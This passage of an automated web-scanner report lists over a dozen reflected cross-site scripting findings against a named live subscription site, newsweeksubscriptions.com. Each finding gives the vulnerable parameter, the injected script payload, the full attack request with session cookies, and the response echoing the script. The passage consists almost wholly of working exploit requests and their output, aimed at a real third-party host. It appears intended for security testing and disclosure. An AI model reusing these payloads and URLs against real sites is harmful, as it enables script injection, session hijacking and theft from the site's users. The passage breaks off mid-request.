Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the city request parameter is copied into the HTML document as plain text between tags. The payload cdee3<script>alert(1)</script>ed2a965c17315b456 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=cdee3<script>alert(1)</script>ed2a965c17315b456&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:46 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
cdee3<script>alert(1)</script>ed2a965c17315b456, AK <br>
...[SNIP]...

1.231. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c34ab'%3balert(1)//ef7adf60f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c34ab';alert(1)//ef7adf60f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/c34ab'%3balert(1)//ef7adf60f5eBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:42 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52795


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=TD/c34ab';alert(1)//ef7adf60f5eBNAV';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.232. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da8a"><script>alert(1)</script>7daa882cfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52825


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TD/9da8a"><script>alert(1)</script>7daa882cfb0BNAV">
...[SNIP]...

1.233. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 3de41<script>alert(1)</script>0f40ef1362bbb5b0 was submitted in the name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=3de41<script>alert(1)</script>0f40ef1362bbb5b0&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:32 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20700


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
3de41<script>alert(1)</script>0f40ef1362bbb5b0<br>
...[SNIP]...

1.234. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63d39"><script>alert(1)</script>abae2437581 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV63d39"><script>alert(1)</script>abae2437581 HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:13 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="TDBNAV63d39"><script>alert(1)</script>abae2437581">
...[SNIP]...

1.235. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd5e'%3balert(1)//7e6518f439b was submitted in the off2on_code parameter. This input was echoed as 9fd5e';alert(1)//7e6518f439b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo&off2on_code=TDBNAV9fd5e'%3balert(1)//7e6518f439b HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:17 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52793


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
   
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=TDBNAV9fd5e';alert(1)//7e6518f439b';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.236. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33396"><script>alert(1)</script>3164ef74c97 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo33396"><script>alert(1)</script>3164ef74c97&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:54 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52823


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo33396"><script>alert(1)</script>3164ef74c97">
...[SNIP]...

1.237. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b713'%3balert(1)//66c9d26a207 was submitted in the off2on_login_url parameter. This input was echoed as 5b713';alert(1)//66c9d26a207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FTcontrol/index.php?off2on_login_url=/promo5b713'%3balert(1)//66c9d26a207&off2on_code=TDBNAV HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:37:58 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52793


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo5b713';alert(1)//66c9d26a207';


url += '&off2on_code=TDBNAV';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.238. https://www.newsweeksubscriptions.com/FTcontrol/index.php [paym parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the paym request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ae7"><script>alert(1)</script>7e268a9164ba3f7 was submitted in the paym parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=86ae7"><script>alert(1)</script>7e268a9164ba3f7&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:16:00 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="paym" id="paym" value="86ae7"><script>alert(1)</script>7e268a9164ba3f7">
...[SNIP]...

1.239. https://www.newsweeksubscriptions.com/FTcontrol/index.php [sessid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the sessid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b02f"><script>alert(1)</script>163c0375087e87f2c was submitted in the sessid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20703


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="sessid" id="sessid" value="276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c">
...[SNIP]...

1.240. https://www.newsweeksubscriptions.com/FTcontrol/index.php [state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the state request parameter is copied into the HTML document as plain text between tags. The payload 9ec71<script>alert(1)</script>48aa07ff265b6b0ec was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
, AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec <br>
...[SNIP]...

1.241. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2edad<script>alert(1)</script>02ccb64bc54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:20 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.242. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98f78<script>alert(1)</script>9ea529c6ac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 is not found !</p>
...[SNIP]...

1.243. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12bcf<script>alert(1)</script>1936c9c86f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.244. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dcc53<script>alert(1)</script>663f9a33b8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
